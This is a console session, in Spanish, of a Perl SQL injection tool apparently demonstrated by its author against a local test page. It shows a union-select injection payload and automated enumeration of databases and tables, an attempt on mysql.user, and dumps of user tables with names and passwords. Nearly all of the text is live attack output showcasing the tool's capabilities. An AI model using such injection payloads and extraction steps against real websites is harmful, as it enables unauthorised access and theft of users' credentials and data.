C:\Users\Javi\Desktop\Under\Scripts>SQLiny.pl http://127.0.0.1/test/SQLi/?id=1 [/\/\/] | Perl SQL Inyector v1.5 <----> By Ca0s {Alias sh0k!} | [\/\/\] ----------------------------------------------------------------------- Gr33tz: | #RemoteExecution | DiosDeLaRed | EvilZone | { st4ck-3rr0r.blogspot.com } [+] Objetivo: http://127.0.0.1/test/SQLi/?id=1 [+] Numero de parametros: 3 [+] URL: -- http://127.0.0.1/test/SQLi/?id=1+AND+1=2+union+select+1,2,3 [+] Valores que imprimen: 1 2 [+] Base de datos actual: test [+] Bases de datos en el servidor: -- information_schema -- bot -- cdcol -- miweb -- mysql -- phpmyadmin -- test [+] Usuario actual: *@localhost [+] Probando load_file(): [-] load_file no disponible. [+] Probando mysql.user... [+] Mysql.Users disponible, extrayendo... -- Numero de usuarios: 2 ! -> Usuario encontrado: * : * ! -> Usuario encontrado: * : * [+] Probando information_schema... Information_Schema disponible, extrayendo nombre de tabla -- Numero de tablas: 70 -- Tablas extraidas: 1 CHARACTER_SETS 2 COLLATIONS 3 COLLATION_CHARACTER_SET_APPLICABILITY 4 COLUMNS 5 COLUMN_PRIVILEGES 6 ENGINES 7 EVENTS 8 FILES 9 GLOBAL_STATUS 10 GLOBAL_VARIABLES 11 KEY_COLUMN_USAGE 12 PARTITIONS 13 PLUGINS 14 PROCESSLIST 15 PROFILING 16 REFERENTIAL_CONSTRAINTS 17 ROUTINES 18 SCHEMATA 19 SCHEMA_PRIVILEGES 20 SESSION_STATUS 21 SESSION_VARIABLES 22 STATISTICS 23 TABLES 24 TABLE_CONSTRAINTS 25 TABLE_PRIVILEGES 26 TRIGGERS 27 USER_PRIVILEGES 28 VIEWS 29 bots 30 logs 31 usuarios 32 varios 33 cds 34 comentariosblog 35 entradasblog 36 frases 37 imagenes 38 usuarios 39 columns_priv 40 db 41 event 42 func 43 general_log 44 help_category 45 help_keyword 46 help_relation 47 help_topic 48 host 49 ndb_binlog_index 50 plugin 51 proc 52 procs_priv 53 servers 54 slow_log 55 tables_priv 56 time_zone 57 time_zone_leap_second 58 time_zone_name 59 time_zone_transition 60 time_zone_transition_type 61 user 62 pma_bookmark 63 pma_column_info 64 pma_designer_coords 65 pma_history 66 pma_pdf_pages 67 pma_relation 68 pma_table_coords 69 pma_table_info 70 sqli [+] Introduce el numero de tabla para extraer sus datos (CTRL+Z para salir)>> 70 -- Tabla-> test.sqli -- Numero de columnas-> 3 -- Columnas: -- nombre -- id -- pass -- Rows: 2 [/] Extraer datos de la tabla? (S/N) --> s [+] Extrayendo datos de la tabla sqli... [*] Formato: [columna](fila) -> dato [nombre](0) -> ca0s [id](0) -> 1 [pass](0) -> test ------------------------------- [nombre](1) -> test [id](1) -> 2 [pass](1) -> asd ------------------------------- [/] Guardar tabla en archivo de texto? (S/N) n [*] Extraer otra tabla? (S/N)s 1 CHARACTER_SETS 2 COLLATIONS 3 COLLATION_CHARACTER_SET_APPLICABILITY 4 COLUMNS 5 COLUMN_PRIVILEGES 6 ENGINES 7 EVENTS 8 FILES 9 GLOBAL_STATUS 10 GLOBAL_VARIABLES 11 KEY_COLUMN_USAGE 12 PARTITIONS 13 PLUGINS 14 PROCESSLIST 15 PROFILING 16 REFERENTIAL_CONSTRAINTS 17 ROUTINES 18 SCHEMATA 19 SCHEMA_PRIVILEGES 20 SESSION_STATUS 21 SESSION_VARIABLES 22 STATISTICS 23 TABLES 24 TABLE_CONSTRAINTS 25 TABLE_PRIVILEGES 26 TRIGGERS 27 USER_PRIVILEGES 28 VIEWS 29 bots 30 logs 31 usuarios 32 varios 33 cds 34 comentariosblog 35 entradasblog 36 frases 37 imagenes 38 usuarios 39 columns_priv 40 db 41 event 42 func 43 general_log 44 help_category 45 help_keyword 46 help_relation 47 help_topic 48 host 49 ndb_binlog_index 50 plugin 51 proc 52 procs_priv 53 servers 54 slow_log 55 tables_priv 56 time_zone 57 time_zone_leap_second 58 time_zone_name 59 time_zone_transition 60 time_zone_transition_type 61 user 62 pma_bookmark 63 pma_column_info 64 pma_designer_coords 65 pma_history 66 pma_pdf_pages 67 pma_relation 68 pma_table_coords 69 pma_table_info 70 sqli [+] Introduce el numero de tabla para extraer sus datos (CTRL+Z para salir)>> 31 -- Tabla-> bot.usuarios -- Numero de columnas-> 4 -- Columnas: -- Nombre -- PassWord -- Nivel -- ID -- Rows: 2 [/] Extraer datos de la tabla? (S/N) --> s [+] Extrayendo datos de la tabla usuarios... [*] Formato: [columna](fila) -> dato [Nombre](0) -> Ca0s [PassWord](0) -> * [Nivel](0) -> Admin [ID](0) -> 1 ------------------------------- [Nombre](1) -> Guest [PassWord](1) -> * [Nivel](1) -> Invitado [ID](1) -> 2 ------------------------------- [/] Guardar tabla en archivo de texto? (S/N) n [*] Extraer otra tabla? (S/N)n [+] Finalizado. <|>->->->->->->->Ca0s {st4ck-3rr0r.blogspot.com}// c40s[at]hotmail[dot]es <-|> C:\Users\Javi\Desktop\Under\Scripts>